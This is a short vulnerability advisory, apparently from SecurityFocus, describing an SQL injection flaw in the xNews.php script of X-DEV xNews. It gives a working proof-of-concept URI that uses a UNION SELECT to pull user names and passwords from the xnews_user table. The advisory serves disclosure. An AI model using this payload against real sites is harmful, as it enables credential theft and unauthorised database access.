X-DEV xNews xNews.php SQL Injection Vulnerability

Attackers can exploit this issue via a web client.

The following URI is sufficient to trigger this issue:

http://www.example.com/xNews.php?act=shownews&id=-1/**/union/**/select/**/0,1,concat(user_name,char(32),user_pass),3,4,5,6/**/from/**/xnews_user/**/where/**/id%20like%201/*


 

Privacy Statement
Copyright 2010, SecurityFocus